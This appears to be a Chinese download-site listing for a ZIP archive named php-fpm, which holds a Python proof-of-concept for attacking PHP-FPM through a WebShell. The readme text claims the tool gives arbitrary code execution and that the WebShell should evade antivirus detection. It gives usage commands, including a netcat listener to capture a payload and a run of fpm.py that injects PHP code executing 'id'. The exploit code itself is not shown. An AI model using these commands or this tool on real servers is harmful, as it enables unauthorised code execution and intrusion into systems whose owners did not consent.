【文件属性】：
文件名称：php-fpm:用WebShell攻击PHP-FPM用WebShell攻击PHP-FPM
文件大小：176KB
文件格式：ZIP
更新时间：2021-03-11 14:40:20
Python 用WebShell攻击PHP-FPM 来自大佬的文末一个想法 快速实现了一个poc，可以实现任意代码执行 后续用单文件PHP实现一个FastCgi Client，然后已知PHP文件就用WebShell本身，没有什么骚操作的话WebShell应该就是免杀的 使用 测试php7.3-fpm，在TCP模式和本地socket都可以运行 echo "<?php echo 1; ?>" > /tmp/poc.php nc -lvp 6666 > payload.txt python fpm.py -c '<?php echo `id`; exit;?>' -p 6666 127.0.0.1 /tmp/poc.php 运行poc.php php poc.php 参考 fpm.py来自
【文件预览】：
php-fpm-master
----poc.php(416B)
----poc.png(175KB)
----fpm.py(8KB)
----.gitignore(12B)
----readme.md(866B)